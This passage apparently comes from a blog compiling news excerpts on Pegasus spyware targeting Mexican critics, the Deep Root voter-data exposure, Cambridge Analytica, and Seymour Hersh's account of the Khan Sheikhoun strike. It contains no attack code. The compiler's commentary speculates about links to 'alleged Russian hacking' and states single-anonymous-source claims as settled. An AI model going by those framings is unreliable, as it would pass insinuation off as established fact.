“We are the new enemies of the state,” said Juan E. Pardinas, the general director of the Mexican Institute for Competitiveness, who has pushed anti-corruption legislation. His iPhone, along with his wife’s, was targeted by the software, according to an independent analysis. “Ours is a society where democracy has been eroded,” he said.
The deployment of sophisticated cyberweaponry against citizens is a snapshot of the struggle for Mexico itself, raising profound legal and ethical questions for a government already facing severe criticism for its human rights record. Under Mexican law, only a federal judge can authorize the surveillance of private communications, and only when officials can demonstrate a sound basis for the request.
It is highly unlikely that the government received judicial approval to hack the phones, according to several former Mexican intelligence officials. Instead, they said, illegal surveillance is standard practice.
“Mexican security agencies wouldn’t ask for a court order, because they know they wouldn’t get one,” said Eduardo Guerrero, a former analyst at the Center for Investigation and National Security, Mexico’s intelligence agency and one of the government agencies that use the Pegasus spyware. “I mean, how could a judge authorize surveillance of someone dedicated to the protection of human rights?”
“There, of course, is no basis for that intervention, but that is besides the point,” he added. “No one in Mexico ever asks for permission to do so.”
The hacking attempts were highly personalized, striking critics with messages designed to inspire fear — and get them to click on a link that would provide unfettered access to their cellphones.
Carmen Aristegui, one of Mexico’s most famous journalists, was targeted by a spyware operator posing as the United States Embassy in Mexico, instructing her to click on a link to resolve an issue with her visa. The wife of Mr. Pardinas, the anti-corruption activist, was targeted with a message claiming to offer proof that he was having an extramarital affair.
For others, imminent danger was the entry point, like a message warning that a truck filled with armed men was parked outside Mr. Pardinas’s home.
“I think that any company that sells a product like this to a government would be horrified by the targets, of course, which don’t seem to fall into the traditional role of criminality,” said John Scott-Railton, a senior researcher at Citizen Lab at the Munk School of Global Affairs at the University of Toronto, which examined the hacking attempts.
The Mexican government acknowledges gathering intelligence against legitimate suspects in accordance with the law. “As in any democratic government, to combat crime and threats against national security the Mexican government carries out intelligence operations,” it said in a statement.
But the government “categorically denies that any of its members engages in surveillance or communications operations against defenders of human rights, journalists, anti-corruption activists or any other person without prior judicial authorization.”
The Mexican government’s deployment of spyware has come under suspicion before, including hacking attempts on political opponents and activists fighting corporate interests in Mexico.
Still, there is no ironclad proof that the Mexican government is responsible. The Pegasus software does not leave behind the hacker’s individual fingerprints. Even the software maker, the NSO Group, says it cannot determine who, exactly, is behind specific hacking attempts.
But cyberexperts can verify when the software has been used on a target’s phone, leaving them with few doubts that the Mexican government, or some rogue actor within it, was involved.
“This is pretty much as good as it gets,” said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.
Moreover, it is extremely unlikely that cybercriminals somehow got their hands on the software, the NSO Group says, because the technology can be used only by the government agency where it is installed.
The company is part of a growing number of digital spying businesses that operate in a loosely regulated space. The market has picked up in recent years, particularly as companies like Apple and Facebook start encrypting their customers’ communications, making it harder for government agencies to conduct surveillance.
Increasingly, governments have found that the only way to monitor mobile phones is by using private businesses like the NSO Group that exploit little-known vulnerabilities in smartphone software. The company has, at times, operated its businesses under different names. One of them, OSY Technologies, paid Michael T. Flynn, President Trump’s former national security adviser, more than $40,000 to be an advisory board member from May 2016 until January, according to his public financial disclosures.
Before selling to governments, the NSO Group says, it vets their human rights records. But once the company licenses the software and installs its hardware inside intelligence and law enforcement agencies, the company says, it has no way of knowing how its spy tools are used — or whom they are used against.
The company simply bills governments based on the total number of surveillance targets. To spy on 10 iPhone users, for example, the company charges $650,000 on top of a flat $500,000 installation fee, according to NSO marketing proposals reviewed by The New York Times.
Even when the NSO Group learns that its software has been abused, there is only so much it can do, the company says, arguing that it cannot simply march into intelligence agencies, remove its hardware and take back its spyware.
“When you’re selling AK-47s, you can’t control how they’ll be used once they leave the loading docks,” said Kevin Mahaffey, chief technology officer at Lookout, a mobile security company.
Rather, the NSO Group relies on its customers to cooperate in a review, then turns over the findings to the appropriate governmental authority — in effect, leaving governments to police themselves.
Typically, the company’s only recourse is to slowly cut off a government’s access to the spy tools over the course of months, or even years, by ceasing to provide new software patches, features and updates. But in the case of Mexico, the NSO Group has not condemned or even acknowledged any abuse, despite repeated evidence that its spy tools have been deployed against ordinary citizens and their families.
5. GOP-affiliated data analytics firm Deep Root has quite a data-privacy violation on its hands. On June 12th, a cybersecurity researcher discovered a Deep Root server with public access to the firm’s proprietary database of the voting habits and political views of over 198 million Americans. Deep Root claims this was all due to an accident.
We wonder if there might be a link between Deep Root’s voter-database operation, other GOP cyber tactics, and the alleged “Russian hacking” of U.S. election systems.
“ . . . . To appeal to the three crucial categories, it appears that Trump’s team relied on voter data provided by Data Trust. Complete voter rolls for 2008 and 2012, as well as partial 2016 voter rolls for Florida and Ohio, apparently compiled by Data Trust are contained in the dataset exposed by Deep Root.
Data Trust acquires voter rolls from state officials and then standardizes the voter data to create a clean, manageable record of all registered US voters, a source familiar with the firm’s operations told Gizmodo. Voter data itself is public record and therefore not particularly sensitive, the source added, but the tools Data Trust uses to standardize that data are considered proprietary. That data is then provided to political clients, including analytics firms like Deep Root. While Data Trust requires its clients to protect the data, it has to take clients at their word that industry-standard encryption and security protocols are in place.
TargetPoint and Causeway, the two firms employed by the RNC in addition to Deep Root, apparently layered their own analytics atop the information provided by Data Trust. TargetPoint conducted thousands of surveys per week in 22 states, according to AdAge, gauging voter sentiment on a variety of topics. While Causeway helped manage the data, Deep Root used it to perfect its TV advertising targets—producing voter turnout estimates by county and using that intelligence to target its ad buys. . . .”
Political data gathered on more than 198 million US citizens was exposed this month after a marketing firm contracted by the Republican National Committee stored internal documents on a publicly accessible Amazon server.
The data leak contains a wealth of personal information on roughly 61 percent of the US population. Along with home addresses, birthdates, and phone numbers, the records include advanced sentiment analyses used by political groups to predict where individual voters fall on hot-button issues such as gun ownership, stem cell research, and the right to abortion, as well as suspected religious affiliation and ethnicity. The data was amassed from a variety of sources—from the banned subreddit r/fatpeoplehate to American Crossroads, the super PAC co-founded by former White House strategist Karl Rove.
Deep Root Analytics, a conservative data firm that identifies audiences for political ads, confirmed ownership of the data to Gizmodo on Friday.
UpGuard cyber risk analyst Chris Vickery discovered Deep Root’s data online last week. More than a terabyte was stored on the cloud server without the protection of a password and could be accessed by anyone who found the URL. Many of the files did not originate at Deep Root, but are instead the aggregate of outside data firms and Republican super PACs, shedding light onto the increasingly advanced data ecosystem that helped propel President Donald Trump’s slim margins in key swing states.
Although files possessed by Deep Root would be typical in any campaign, Republican or Democratic, experts say its exposure in a single open database raises significant privacy concerns. “This is valuable for people who have nefarious purposes,” Joseph Lorenzo Hall, the chief technologist at the Center for Democracy and Technology, said of the data.
The RNC paid Deep Root $983,000 last year, according to Federal Election Commission reports, but its server contained records from a variety of other conservative sources paid millions more, including The Data Trust (also known as GOP Data Trust), the Republican party’s primary voter file provider. Data Trust received over $6.7 million from the RNC during the 2016 cycle, according to OpenSecrets.org, and its president, Johnny DeStefano, now serves as Trump’s director of presidential personnel.
The Koch brothers’ political group Americans for Prosperity, which had a data-swapping agreement with Data Trust during the 2016 election cycle, contributed heavily to the exposed files, as did the market research firm TargetPoint, whose co-founder previously served as director of Mitt Romney’s strategy team. (The Koch brothers also subsidized a data company known as i360, which began exchanging voter files with Data Trust in 2014.) Furthermore, the files provided by Rove’s American Crossroads contain strategic voter data used to target, among others, disaffected Democrats and undecideds in Nevada, New Hampshire, Ohio, and other key battleground states.
Deep Root further obtained hundreds of files (at least) from The Kantar Group, a leading media and market research company with offices in New York, Beijing, Moscow, and more than a hundred other cities on six continents. Each file offers rich details about political ads—estimated cost, audience demographics, reach, and more—by and about figures and groups spanning the political spectrum. There are files on the Democratic Senatorial Campaign Committee, Planned Parenthood, and the American Civil Liberties Union, as well as files on every 2016 presidential candidate, Republicans included.
What’s more, the Kantar files each contain video links to related political ads stored on Kantar’s servers.
Spreadsheets acquired from TargetPoint, which partnered with Deep Root and GOP Data Trust during the 2016 election, include the home addresses, birthdates, and party affiliations of nearly 200 million registered voters in the 2008 and 2012 presidential elections, as well as some 2016 voters. TargetPoint’s data seeks to resolve questions about where individual voters stand on dozens of political issues. For example: Is the voter eco-friendly? Do they favor lowering taxes? Do they believe the Democrats should stand up to Trump? Do they agree with Trump’s “America First” economic stance? Pharmaceutical companies do great damage: Agree or Disagree?
The details of voters’ likely preferences for issues like stem cell research and gun control were likely drawn from a variety of sources according to a Democratic strategist who spoke with Gizmodo.
“Data like that would be a combination of polling data, real world data from door-knocking and phone-calling and other canvassing activities, coupled with modeling using the data we already have to extrapolate what the voters we don’t know about would think,” the strategist said. “The campaigns that do it right combine all the available data together to make the most robust model for every single voter in the target universe.”
…
Deep Root’s data was exposed after the company updated its security settings on June 1, Lundry said. Deep Root has retained Stroz Friedberg, a cybersecurity and digital forensics firm, to investigate. “Based on the information we have gathered thus far, we do not believe that our systems have been hacked,” Lundry added.
So far, Deep Root doesn’t believe its proprietary data was accessed by any malicious third parties during the 12 days that the data was exposed on the open web.
Deep Root’s server was discovered by UpGuard’s Vickery on the night of June 12 as he was searching for data publicly accessible on Amazon’s cloud service. He used the same process last month to detect sensitive files tied to a US Defense Department project and exposed by an employee of a top defense contractor.
This is not the first leak of voter files uncovered by Vickery, who told Gizmodo that he was alarmed over how the data was apparently being used—some states, for instance, prohibit the commercial use of voter records. Moreover, it was not immediately clear to whom the data belonged. “It was decided that law enforcement should be contacted before attempting any contact with the entity responsible,” said Vickery, who reported that the server was secured two days later on June 14.
A web of data firms funnel research into campaigns
Deep Root’s data sheds light onto the increasingly sophisticated data operation that has fed recent Republican campaigns and lays bare the intricate network of political organizations, PACs, and analysis firms that trade in bulk voter data. In an email to Gizmodo, Deep Root said that its voter models are used to enhance the understanding of TV viewership for political ad buyers. “The data accessed was not built for or used by any specific client,” Lundry said. “It is our proprietary analysis to help inform local television ad buying.”
However, the presence of data on the server from several political organizations, including TargetPoint and Data Trust, suggests that it was used for Republican political campaigns. Deep Root also works primarily with GOP customers (although similar vendors, such as NationBuilder, service the Democrats as well).
Deep Root is one of three data firms hired by the Republican National Committee in the run-up to the 2016 presidential election. Founded by Lundry, a data scientist on the Jeb Bush and Mitt Romney campaigns, the firm was one of three analytics teams that worked on the Trump campaign following the party’s national convention in the summer of 2016.
Lundry’s work brought him into Trump’s campaign war room, according to a post-election AdAge article that charted the GOP’s 2016 data efforts. Deep Root was hand-picked by the RNC’s then-chief of staff, Katie Walsh, in September of last year and joined two other data shops—TargetPoint Consulting and Causeway Solutions—in the effort to win Trump the presidency.
…
To appeal to the three crucial categories, it appears that Trump’s team relied on voter data provided by Data Trust. Complete voter rolls for 2008 and 2012, as well as partial 2016 voter rolls for Florida and Ohio, apparently compiled by Data Trust are contained in the dataset exposed by Deep Root.
Data Trust acquires voter rolls from state officials and then standardizes the voter data to create a clean, manageable record of all registered US voters, a source familiar with the firm’s operations told Gizmodo. Voter data itself is public record and therefore not particularly sensitive, the source added, but the tools Data Trust uses to standardize that data are considered proprietary. That data is then provided to political clients, including analytics firms like Deep Root. While Data Trust requires its clients to protect the data, it has to take clients at their word that industry-standard encryption and security protocols are in place.
TargetPoint and Causeway, the two firms employed by the RNC in addition to Deep Root, apparently layered their own analytics atop the information provided by Data Trust. TargetPoint conducted thousands of surveys per week in 22 states, according to AdAge, gauging voter sentiment on a variety of topics. While Causeway helped manage the data, Deep Root used it to perfect its TV advertising targets—producing voter turnout estimates by county and using that intelligence to target its ad buys.
A source with years of experience working on political campaign data operations told Gizmodo that the data exposed by Deep Root appeared to be customized for the RNC and had apparently been used to create models for turnout and voter preferences. Metadata in the files suggested that the database wasn’t Deep Root’s working copy, but rather a post-election version of its data, the source said, adding that it was somewhat surprising the files hadn’t been discarded.
Because the data from the 2008 and 2012 elections is outdated—the source compared it to the kind of address and phone data one could find on a “lousy internet lookup site”—it’s not very valuable. Even the 2016 data is quickly becoming stale. “This is a proprietary dataset based on a mix of public records, data from commercial providers, and a variety of predictive models of uncertain provenance and quality,” the source said, adding: “Undoubtedly it took millions of dollars to produce.”
Although basic voter information is public record, Deep Root’s dataset contains a swirl of proprietary information from the RNC’s data firms. Many of the filenames indicate they potentially contain market research on Democratic candidates and the independent expenditure committees that support them. (Up to two terabytes of data contained on the server was protected by permission settings.)
One exposed folder is labeled “Exxon-Mobile” [sic] and contains spreadsheets apparently used to predict which voters support the oil and gas industry. Divided by state, the files include the voters’ names and addresses, along with a unique RNC identification number assigned to every US citizen registered to vote. Each row indicates where voters likely fall on issues of interest to ExxonMobil, the country’s biggest natural gas producer.
The data evaluates, for example, whether or not a specific voter believes drilling for fossil fuels is vital to US security. It also predicts if the voter thinks the US should be moving away from fossil-fuel use. The ExxonMobil “national score” document alone contains data on 182,746,897 Americans spread across 19 fields.
Reddit analysis
Some of the data included in Deep Root’s dataset veers into downright bizarre territory. A folder titled simply ‘reddit’ houses 170 GBs of data apparently scraped from several subreddits, including the controversial r/fatpeoplehate that was home to a community of people who posted pictures of people and mocked them for their weight before it was banned from Reddit’s platform in 2015. Other subreddits that appear to have been scraped by Deep Root or a partner organization focused on more benign topics, like mountain biking and the Spanish language.
The Reddit data could’ve been used as training data for an artificial intelligence algorithm focused on natural language processing, or it might have been harvested as part of an effort to match up Reddit users with their voter registration records. During the 2012 election cycle, Barack Obama’s campaign data team relied on information gleaned from Facebook profiles and matched profiles to voter records.
During the 2016 election season, Reddit played host to a legion of Trump supporters who gathered in subreddits like r/The_Donald to comb through leaked Democratic National Committee emails and craft pro-Trump memes. Trump himself participated in an “Ask Me Anything” session on r/The_Donald during his campaign.
Given how active some Trump supporters are on Reddit—r/The_Donald currently boasts more than 430,000 members—it makes sense that Trump’s data team might be interested in analyzing data from the site.
A FiveThirtyEight analysis that looked at where r/The_Donald members spend their time when they’re not talking politics might shed some light onto why Deep Root collected r/fatpeoplehate data. FiveThirtyEight found that, when Redditors weren’t commenting in political subreddits, they most often frequented r/fatpeoplehate.
It’s possible that Deep Root intended to use data from r/fatpeoplehate to build a more comprehensive profile of Trump voters. (Lundry declined to comment beyond his initial statement on any of the information included in the Deep Root dataset.)
However, FiveThirtyEight’s investigation doesn’t account for Deep Root’s collection of data from mountain-biking and Spanish-speaking subreddits that weren’t as popular with r/The_Donald members—and data from these subreddits that are not so closely linked to Trump’s diehard supporters might be more useful for his campaign’s goal of pursuing swing voters.
“My guess is that they were scraping Reddit posts to match to the voter file as another input for individual modeling,” a source familiar with campaign data operations told Gizmodo. “Given the number of random forums, my guess is they started with a list of accounts to scrape from, rather than scraping from all forums then trying to match from there (in which case you’d start with the political ones).”
Matching voter records with Reddit usernames would be complicated and any large-scale effort would likely result in many inaccuracies, the source said. However, campaigns have attempted to match voter files with social media profiles in the past. Such an effort by Deep Root wouldn’t be entirely surprising, and would likely yield rich data on the small portion of users it was able to match with their voter profiles, the source explained.
Data exposes sensitive voter info
The Deep Root incident represents the largest known leak of Americans’ voter records, outstripping past exposures by several million records. Five voter-file leaks over the past 18 months exposed between 350,000 and 191 million files, some of which paired voter data—name, race, gender, birthdate, address, phone number, party affiliation, etc.—with email accounts, social media profiles, and records of gun ownership.
Campaigns and the data analysis firms they employ are a particularly weak point for data exposure, security experts say. Corporations that don’t properly secure customer data can face significant financial repercussions—just ask Target or Yahoo. But because campaigns are short-term operations, there’s not much incentive for them to take data security seriously, and valuable data is often left out to rust after an election.
“Campaigns are very narrowly focused. They are shoestring operations, even presidential campaigns. So they don’t think of this as an asset they need to protect,” the Center for Democracy and Technology’s Hall told Gizmodo.
Even though voter rolls are public record and are easy to access—Ohio, for instance, makes its voter rolls available to download online—their exposure can still be harmful.
Voter registration records include ZIP codes, birthdates, and other personal information that have been crucial in research efforts to re-identify anonymous medical data. Latanya Sweeney, a professor of government and technology at Harvard University, famously used voter data to re-identify Massachusetts Governor William Weld from information in anonymous hospital discharge records.
Because of the personal information they contain, voter registration databases can also be useful in identity theft schemes.
Even though exposure of Deep Root’s data has the potential to harm voters, it’s exactly the kind of data that campaigns lust after and will spend millions of dollars to obtain. Campaigns are motivated to accumulate as much deeply personal information about voters as possible, so they can spend their ad dollars in the right swing districts where they’re likely to sway the greatest number of voters. But voter data rapidly goes stale and campaigns close up shop quickly, so data is seen as disposable and often isn’t well-protected.
“I can think of no avenues for punishing political data breaches or otherwise properly aligning the incentives. I worry that if there’s no way to punish campaigns for leaking this stuff, it’s going to continue to happen until something bad happens,” Hall said. The data left behind by campaigns can pose a lingering security issue, he added. “None of these motherfuckers were ever Boy Scouts or Girl Scouts, they don’t pack out what they pack in.”
7. Where’s Cambridge Analytica? Did they get access to that data too? They were Trump’s primary Big Data secret weapon. So is this data redundant for them? If not, and this data really is of use to Cambridge Analytica, then if we’re trying to think of a likely intended recipient for those terabytes of data it’s hard to think of a likelier recipient than Cambridge Analytica. Especially after it was announced back in January that the RNC’s Big Data guru was heading over to Cambridge Analytica as part of a bid to turn the firm into the RNC’s Big Data firm of choice:
“Trump’s Data Firm Snags RNC Tech Guru Darren Bolding” by Issie Lapowsky; Wired; 01/16/17
British newcomers Cambridge Analytica earned serious bragging rights—and more than a few enemies—as the data firm that helped engineer Donald Trump’s victory in its first US presidential election. Now it’s poaching the Republican National Committee’s chief technology officer, Darren Bolding, in a quest to become the analytics outfit of record for the GOP.
Bolding, who in November 2015 became the RNC’s third CTO in as many years after building his career as an engineer in Silicon Valley, will assume the title of CTO at Cambridge, where he will build products for commercial and political clients. “We want to be able to scale up what we’re already doing, since there’s been quite a lot of interest from the commercial and political space,” he says.
Cambridge’s pitch is that it divides audiences into “psychographic groups” to target them with the kinds of messages that, like most ads, are based on demographic factors but also are most likely to appeal to their emotional and psychological profiles. The effectiveness of, and methodology behind, these tactics remain the subject of great debate among the Beltway’s traditional data minds, who express skepticism about Cambridge’s ability to deliver on its promises. But Trump’s victory in November was a blow to the firm’s detractors.
Though Cambridge is now pursuing commercial clients through its new office in New York, it’s also expanding its DC operation and hopes to secure government and defense contracts under the Trump administration. Cambridge already has the requisite ties. Not only did it work for the Trump campaign, but Steve Bannon, Trump’s chief strategist, serves on the firm’s board.
Cambridge also is funded by Robert Mercer, the billionaire donor who gave millions to Trump Super PACs and whose daughter Rebekah Mercer serves on the Trump transition team. She reportedly is involved in shaping the non-profit organization that will serve as a fundraising and messaging vehicle for the Trump administration. That could give Cambridge an advantage in securing its business. Cambridge Analytica declined to comment on these potential deals, and the Trump transition team has not yet responded to WIRED’s request for comment.
Bolding’s departure from the RNC comes as Republicans and Democrats alike grapple with the threat of cyber attacks in the wake of the breach, attributed to Russian hackers, of the Democratic National Committee during the 2016 election. During his press conference this week, president-elect Trump scolded the DNC for allowing such an attack and claimed that hackers were foiled in their attempt to penetrate the Republican National Committee. Bolding confirms the RNC experienced frequent attacks throughout the election cycle. “We were very vigorously attacked,” Bolding says. “I’ve done this for large commercial companies that have had significant threats, but this was really intense.”
While there may have been no breaches of recent RNC data, in a hearing before the Senate Select Committee on Intelligence Tuesday, FBI director James Comey said that “information was harvested” from old RNC email domains that are no longer in use, though none of that information was released.
…
———-
“British newcomers Cambridge Analytica earned serious bragging rights—and more than a few enemies—as the data firm that helped engineer Donald Trump’s victory in its first US presidential election. Now it’s poaching the Republican National Committee’s chief technology officer, Darren Bolding, in a quest to become the analytics outfit of record for the GOP.”
8. Seymour Hersh has a piece in Die Welt about the intelligence that went into the Trump administration’s decision to launch a cruise missile strike against a Syrian airbase following the alleged sarin gas attack on the city of Khan Sheikhoun in Idlib.
So what did the intelligence community know about the attack? Well, the Russian and Syrian air forces had in fact informed the US in advance of that airstrike that they had intelligence that top-level leaders of Ahrar al-Sham and Jabhat al-Nusra were meeting in that building; they informed the US of the attack plan in advance of the attack and that it was on a “high-value” target. And the attack involved the unusual use of a guided bomb and Syria’s top pilots. Following the attack, US intelligence concluded that there was no sarin gas attack, that Assad wouldn’t have been that politically suicidal, and that the symptoms of chemical poisoning following the bombing were likely due to a mixture of chlorine, fertilizers, and other chemicals stored in the building targeted by the Syrian air force, released by secondary explosions from the initial bombing.
Key portions of Hersh’s story:
“. . . . The Syrian target at Khan Sheikhoun, as shared with the Americans at Doha, was depicted as a two-story cinder-block building in the northern part of town. Russian intelligence, which is shared when necessary with Syria and the U.S. as part of their joint fight against jihadist groups, had established that a high-level meeting of jihadist leaders was to take place in the building, including representatives of Ahrar al-Sham and the al-Qaida-affiliated group formerly known as Jabhat al-Nusra. The two groups had recently joined forces, and controlled the town and surrounding area. Russian intelligence depicted the cinder-block building as a command and control center that housed a grocery and other commercial premises on its ground floor with other essential shops nearby, including a fabric shop and an electronics store.
‘The rebels control the population by controlling the distribution of goods that people need to live – food, water, cooking oil, propane gas, fertilizers for growing their crops, and insecticides to protect the crops,’ a senior adviser to the American intelligence community, who has served in senior positions in the Defense Department and Central Intelligence Agency, told me. The basement was used as storage for rockets, weapons and ammunition, as well as products that could be distributed for free to the community, among them medicines and chlorine-based decontaminants for cleansing the bodies of the dead before burial. The meeting place – a regional headquarters – was on the floor above. ‘It was an established meeting place,’ the senior adviser said. ‘A long-time facility that would have had security, weapons, communications, files and a map center.’ The Russians were intent on confirming their intelligence and deployed a drone for days above the site to monitor communications and develop what is known in the intelligence community as a POL – a pattern of life. The goal was to take note of those going in and out of the building, and to track weapons being moved back and forth, including rockets and ammunition.
…
Russian and Syrian intelligence officials, who coordinate operations closely with the American command posts, made it clear that the planned strike on Khan Sheikhoun was special because of the high-value target. “It was a red-hot change. The mission was out of the ordinary – scrub the sked,” the senior adviser told me. “Every operations officer in the region” – in the Army, Marine Corps, Air Force, CIA and NSA – “had to know there was something going on. The Russians gave the Syrian Air Force a guided bomb and that was a rarity. They’re skimpy with their guided bombs and rarely share them with the Syrian Air Force. And the Syrians assigned their best pilot to the mission, with the best wingman.” The advance intelligence on the target, as supplied by the Russians, was given the highest possible score inside the American community.
The Execute Order governing U.S. military operations in theater, which was issued by the Chairman of the Joint Chiefs of Staff, provides instructions that demarcate the relationship between the American and Russian forces operating in Syria. “It’s like an ops order – ‘Here’s what you are authorized to do,’” the adviser said. “We do not share operational control with the Russians. We don’t do combined operations with them, or activities directly in support of one of their operations. But coordination is permitted. We keep each other apprised of what’s happening and within this package is the mutual exchange of intelligence. If we get a hot tip that could help the Russians do their mission, that’s coordination; and the Russians do the same for us. When we get a hot tip about a command and control facility,” the adviser added, referring to the target in Khan Sheikhoun, “we do what we can to help them act on it.” “This was not a chemical weapons strike,” the adviser said. “That’s a fairy tale. If so, everyone involved in transferring, loading and arming the weapon – you’ve got to make it appear like a regular 500-pound conventional bomb – would be wearing Hazmat protective clothing in case of a leak. There would be very little chance of survival without such gear. Military grade sarin includes additives designed to increase toxicity and lethality. Every batch that comes out is maximized for death. That is why it is made. It is odorless and invisible and death can come within a minute. No cloud. Why produce a weapon that people can run away from?”
The target was struck at 6:55 a.m. on April 4, just before midnight in Washington. A Bomb Damage Assessment (BDA) by the U.S. military later determined that the heat and force of the 500-pound Syrian bomb triggered a series of secondary explosions that could have generated a huge toxic cloud that began to spread over the town, formed by the release of the fertilizers, disinfectants and other goods stored in the basement, its effect magnified by the dense morning air, which trapped the fumes close to the ground. According to intelligence estimates, the senior adviser said, the strike itself killed up to four jihadist leaders, and an unknown number of drivers and security aides. There is no confirmed count of the number of civilians killed by the poisonous gases that were released by the secondary explosions, although opposition activists reported that there were more than 80 dead, and outlets such as CNN have put the figure as high as 92. A team from Médecins Sans Frontières, treating victims from Khan Sheikhoun at a clinic 60 miles to the north, reported that “eight patients showed symptoms – including constricted pupils, muscle spasms and involuntary defecation – which are consistent with exposure to a neurotoxic agent such as sarin gas or similar compounds.” MSF also visited other hospitals that had received victims and found that patients there “smelled of bleach, suggesting that they had been exposed to chlorine.” In other words, evidence suggested that there was more than one chemical responsible for the symptoms observed, which would not have been the case if the Syrian Air Force – as opposition activists insisted – had dropped a sarin bomb, which has no percussive or ignition power to trigger secondary explosions. The range of symptoms is, however, consistent with the release of a mixture of chemicals, including chlorine and the organophosphates used in many fertilizers, which can cause neurotoxic effects similar to those of sarin.
…A Bomb Damage Assessment (BDA) by the U.S. military later determined that the heat and force of the 500-pound Syrian bomb triggered a series of secondary explosions that could have generated a huge toxic cloud that began to spread over the town, formed by the release of the fertilizers, disinfectants and other goods stored in the basement, its effect magnified by the dense morning air, which trapped the fumes close to the ground. . . . ”
” . . . . The crisis slid into the background by the end of April, as Russia, Syria and the United States remained focused on annihilating ISIS and the militias of al-Qaida. Some of those who had worked through the crisis, however, were left with lingering concerns. ‘The Salafists and jihadists got everything they wanted out of their hyped-up Syrian nerve gas ploy,’ the senior adviser to the U.S. intelligence community told me, referring to the flare up of tensions between Syria, Russia and America. ‘The issue is, what if there’s another false flag sarin attack credited to hated Syria? Trump has upped the ante and painted himself into a corner with his decision to bomb. And do not think these guys are not planning the next faked attack. Trump will have no choice but to bomb again, and harder. He’s incapable of saying he made a mistake.’ . . .”
“Trump’s Red Line” by Seymour M. Hersh; Welt.de; 06/25/2017
On April 6, United States President Donald Trump authorized an early morning Tomahawk missile strike on Shayrat Air Base in central Syria in retaliation for what he said was a deadly nerve agent attack carried out by the Syrian government two days earlier in the rebel-held town of Khan Sheikhoun. Trump issued the order despite having been warned by the U.S. intelligence community that it had found no evidence that the Syrians had used a chemical weapon.
The available intelligence made clear that the Syrians had targeted a jihadist meeting site on April 4 using a Russian-supplied guided bomb equipped with conventional explosives. Details of the attack, including information on its so-called high-value targets, had been provided by the Russians days in advance to American and allied military officials in Doha, whose mission is to coordinate all U.S., allied, Syrian and Russian Air Force operations in the region.
Some American military and intelligence officials were especially distressed by the president’s determination to ignore the evidence. “None of this makes any sense,” one officer told colleagues upon learning of the decision to bomb. “We KNOW that there was no chemical attack … the Russians are furious. Claiming we have the real intel and know the truth … I guess it didn’t matter whether we elected Clinton or Trump.”
Within hours of the April 4 bombing, the world’s media was saturated with photographs and videos from Khan Sheikhoun. Pictures of dead and dying victims, allegedly suffering from the symptoms of nerve gas poisoning, were uploaded to social media by local activists, including the White Helmets, a first responder group known for its close association with the Syrian opposition.
The provenance of the photos was not clear and no international observers have yet inspected the site, but the immediate popular assumption worldwide was that this was a deliberate use of the nerve agent sarin, authorized by President Bashar Assad of Syria. Trump endorsed that assumption by issuing a statement within hours of the attack, describing Assad’s “heinous actions” as being a consequence of the Obama administration’s “weakness and irresolution” in addressing what he said was Syria’s past use of chemical weapons.
To the dismay of many senior members of his national security team, Trump could not be swayed over the next 48 hours of intense briefings and decision-making. In a series of interviews, I learned of the total disconnect between the president and many of his military advisers and intelligence officials, as well as officers on the ground in the region who had an entirely different understanding of the nature of Syria’s attack on Khan Sheikhoun. I was provided with evidence of that disconnect, in the form of transcripts of real-time communications, immediately following the Syrian attack on April 4. In an important pre-strike process known as deconfliction, U.S. and Russian officers routinely supply one another with advance details of planned flight paths and target coordinates, to ensure that there is no risk of collision or accidental encounter (the Russians speak on behalf of the Syrian military). This information is supplied daily to the American AWACS surveillance planes that monitor the flights once airborne. Deconfliction’s success and importance can be measured by the fact that there has yet to be one collision, or even a near miss, among the high-powered supersonic American, Allied, Russian and Syrian fighter bombers.
Russian and Syrian Air Force officers gave details of the carefully planned flight path to and from Khan Sheikhoun on April 4 directly, in English, to the deconfliction monitors aboard the AWACS plane, which was on patrol near the Turkish border, 60 miles or more to the north.
The Syrian target at Khan Sheikhoun, as shared with the Americans at Doha, was depicted as a two-story cinder-block building in the northern part of town. Russian intelligence, which is shared when necessary with Syria and the U.S. as part of their joint fight against jihadist groups, had established that a high-level meeting of jihadist leaders was to take place in the building, including representatives of Ahrar al-Sham and the al-Qaida-affiliated group formerly known as Jabhat al-Nusra. The two groups had recently joined forces, and controlled the town and surrounding area. Russian intelligence depicted the cinder-block building as a command and control center that housed a grocery and other commercial premises on its ground floor with other essential shops nearby, including a fabric shop and an electronics store.
“The rebels control the population by controlling the distribution of goods that people need to live – food, water, cooking oil, propane gas, fertilizers for growing their crops, and insecticides to protect the crops,” a senior adviser to the American intelligence community, who has served in senior positions in the Defense Department and Central Intelligence Agency, told me. The basement was used as storage for rockets, weapons and ammunition, as well as products that could be distributed for free to the community, among them medicines and chlorine-based decontaminants for cleansing the bodies of the dead before burial. The meeting place – a regional headquarters – was on the floor above. “It was an established meeting place,” the senior adviser said. “A long-time facility that would have had security, weapons, communications, files and a map center.” The Russians were intent on confirming their intelligence and deployed a drone for days above the site to monitor communications and develop what is known in the intelligence community as a POL – a pattern of life. The goal was to take note of those going in and out of the building, and to track weapons being moved back and forth, including rockets and ammunition.
One reason for the Russian message to Washington about the intended target was to ensure that any CIA asset or informant who had managed to work his way into the jihadist leadership was forewarned not to attend the meeting. I was told that the Russians passed the warning directly to the CIA. “They were playing the game right,” the senior adviser said. The Russian guidance noted that the jihadist meeting was coming at a time of acute pressure for the insurgents: Presumably Jabhat al-Nusra and Ahrar al-Sham were desperately seeking a path forward in the new political climate. In the last few days of March, Trump and two of his key national security aides – Secretary of State Rex Tillerson and UN Ambassador Nikki Haley – had made statements acknowledging that, as the New York Times put it, the White House “has abandoned the goal” of pressuring Assad “to leave power, marking a sharp departure from the Middle East policy that guided the Obama administration for more than five years.” White House Press Secretary Sean Spicer told a press briefing on March 31 that “there is a political reality that we have to accept,” implying that Assad was there to stay.
Russian and Syrian intelligence officials, who coordinate operations closely with the American command posts, made it clear that the planned strike on Khan Sheikhoun was special because of the high-value target. “It was a red-hot change. The mission was out of the ordinary – scrub the sked,” the senior adviser told me. “Every operations officer in the region” – in the Army, Marine Corps, Air Force, CIA and NSA – “had to know there was something going on. The Russians gave the Syrian Air Force a guided bomb and that was a rarity. They’re skimpy with their guided bombs and rarely share them with the Syrian Air Force. And the Syrians assigned their best pilot to the mission, with the best wingman.” The advance intelligence on the target, as supplied by the Russians, was given the highest possible score inside the American community.
